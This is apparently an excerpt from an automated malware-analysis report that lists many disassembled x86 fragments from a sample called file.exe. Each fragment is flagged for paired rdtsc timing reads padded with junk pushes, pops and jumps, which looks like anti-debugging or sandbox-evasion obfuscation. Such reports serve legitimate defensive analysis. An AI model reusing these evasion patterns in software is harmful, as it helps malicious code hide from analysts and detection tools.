Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9560DE second address: 95610C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED006918h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [eax] 0x0000000d jc 00007FA1ED006912h 0x00000013 je 00007FA1ED00690Ch 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 95610C second address: 95612C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dword ptr [esp+04h], eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA1ECFCB2A5h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9562AE second address: 956331 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1ED00690Ch 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ecx 0x00000011 call 00007FA1ED006908h 0x00000016 pop ecx 0x00000017 mov dword ptr [esp+04h], ecx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ecx 0x00000024 push ecx 0x00000025 ret 0x00000026 pop ecx 0x00000027 ret 0x00000028 mov edi, esi 0x0000002a jmp 00007FA1ED006911h 0x0000002f lea eax, dword ptr [ebp+12479ACFh] 0x00000035 push 00000000h 0x00000037 push edx 0x00000038 call 00007FA1ED006908h 0x0000003d pop edx 0x0000003e mov dword ptr [esp+04h], edx 0x00000042 add dword ptr [esp+04h], 00000014h 0x0000004a inc edx 0x0000004b push edx 0x0000004c ret 0x0000004d pop edx 0x0000004e ret 0x0000004f jc 00007FA1ED006908h 0x00000055 mov edi, edx 0x00000057 or di, 96EBh 0x0000005c nop 0x0000005d push eax 0x0000005e push edx 0x0000005f push edi 0x00000060 jnl 00007FA1ED006906h 0x00000066 pop edi 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 956331 second address: 93FDB1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FA1ECFCB2A5h 0x00000010 jmp 00007FA1ECFCB29Bh 0x00000015 popad 0x00000016 nop 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007FA1ECFCB298h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000018h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D35A3h], eax 0x00000037 mov dword ptr [ebp+1244AC4Bh], edx 0x0000003d call dword ptr [ebp+122D1F3Bh] 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007FA1ECFCB29Ah 0x0000004a jmp 00007FA1ECFCB2A2h 0x0000004f pop edx 0x00000050 pop eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 popad 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 998359 second address: 998370 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA1ED006919h 0x00000008 jmp 00007FA1ED00690Dh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99851A second address: 99855B instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1ECFCB296h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FA1ECFCB2A9h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop eax 0x00000018 pushad 0x00000019 jmp 00007FA1ECFCB2A2h 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99855B second address: 998560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 998560 second address: 998565 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 998978 second address: 998982 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FA1ED006906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 998AD4 second address: 998AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 998AD8 second address: 998AE8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jp 00007FA1ED006906h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CCBE second address: 99CCD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA1ECFCB29Ah 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F0AE second address: 99F0B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F0B3 second address: 99F0B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F0B9 second address: 99F0C3 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A07F5 second address: 9A0823 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1ECFCB2A4h 0x00000009 jmp 00007FA1ECFCB2A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A35F7 second address: 9A3601 instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1ED006906h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A3154 second address: 9A317A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA1ECFCB2A0h 0x0000000b jmp 00007FA1ECFCB2A0h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A32EE second address: 9A32F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A32F2 second address: 9A32FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A32FB second address: 9A3300 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A7E8F second address: 9A7E93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A7E93 second address: 9A7EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jg 00007FA1ED006906h 0x0000000f jmp 00007FA1ED006918h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A7AB3 second address: 9A7ABF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA1ECFCB296h 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AD56F second address: 9AD573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AD573 second address: 9AD579 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9ABF74 second address: 9ABFB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED006913h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA1ED006911h 0x0000000e jmp 00007FA1ED006916h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AC431 second address: 9AC43F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jnp 00007FA1ECFCB296h 0x0000000d pop edi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AC43F second address: 9AC444 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AC5C4 second address: 9AC5DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ECFCB2A4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955B35 second address: 955B39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 955B39 second address: 955B43 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1ECFCB29Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B07F1 second address: 9B07F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B0ADB second address: 9B0AED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA1ECFCB29Eh 0x0000000a jne 00007FA1ECFCB296h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B0D70 second address: 9B0D74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B0D74 second address: 9B0D78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B0D78 second address: 9B0D7E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B0D7E second address: 9B0D84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B0D84 second address: 9B0D8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B0D8A second address: 9B0DB4 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1ECFCB29Fh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e push ecx 0x0000000f jmp 00007FA1ECFCB29Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B0DB4 second address: 9B0DBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B0DBD second address: 9B0DDF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1ECFCB2A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B7137 second address: 9B7158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FA1ED006906h 0x0000000c popad 0x0000000d je 00007FA1ED00690Eh 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B7158 second address: 9B715C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B72C9 second address: 9B72CF instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B72CF second address: 9B72E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA1ECFCB29Bh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B72E2 second address: 9B72E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B72E8 second address: 9B72EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B8920 second address: 9B8924 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B8924 second address: 9B8938 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA1ECFCB29Bh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B8C3B second address: 9B8C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B8C41 second address: 9B8C47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B8C47 second address: 9B8C4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BCC58 second address: 9BCC6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jl 00007FA1ECFCB296h 0x0000000c je 00007FA1ECFCB296h 0x00000012 popad 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BCC6E second address: 9BCCA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ED006913h 0x00000009 pop esi 0x0000000a jmp 00007FA1ED00690Ah 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FA1ED00690Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BCCA0 second address: 9BCCA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BCCA8 second address: 9BCCAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BCCAC second address: 9BCCB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC3D4 second address: 9BC3D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC3D8 second address: 9BC400 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB2A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jno 00007FA1ECFCB296h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC544 second address: 9BC548 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC548 second address: 9BC54C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC54C second address: 9BC552 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC552 second address: 9BC568 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007FA1ECFCB29Ch 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC568 second address: 9BC57F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ED00690Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b jc 00007FA1ED006906h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC6E1 second address: 9BC6E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC96B second address: 9BC971 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BC971 second address: 9BC975 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C8BFD second address: 9C8C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C8C01 second address: 9C8C05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7226 second address: 9C722A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7367 second address: 9C7372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7372 second address: 9C7382 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA1ED006906h 0x00000008 jnp 00007FA1ED006906h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7681 second address: 9C7686 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7BF1 second address: 9C7BF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7BF5 second address: 9C7C01 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jno 00007FA1ECFCB296h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7C01 second address: 9C7C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FA1ED006906h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C7C0B second address: 9C7C20 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA1ECFCB29Dh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9C8AE7 second address: 9C8AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9CE735 second address: 9CE73B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1B04 second address: 9D1B25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FA1ED006915h 0x0000000b js 00007FA1ED006906h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1B25 second address: 9D1B36 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1ECFCB29Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1B36 second address: 9D1B5D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA1ED00690Fh 0x00000008 jmp 00007FA1ED006913h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1B5D second address: 9D1B81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jbe 00007FA1ECFCB2DEh 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FA1ECFCB2A5h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1B81 second address: 9D1BA1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jmp 00007FA1ED006916h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1560 second address: 9D156A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA1ECFCB296h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D156A second address: 9D1574 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA1ED006906h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1574 second address: 9D1595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007FA1ECFCB296h 0x0000000e jmp 00007FA1ECFCB2A3h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1595 second address: 9D1599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1599 second address: 9D15B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jnl 00007FA1ECFCB296h 0x0000000f ja 00007FA1ECFCB296h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1856 second address: 9D185A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D185A second address: 9D1860 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DC788 second address: 9DC78C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DC78C second address: 9DC7AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FA1ECFCB2A3h 0x0000000b popad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f push edx 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DC7AB second address: 9DC7AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DC7AF second address: 9DC7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA1ECFCB29Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jp 00007FA1ECFCB29Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DC954 second address: 9DC960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
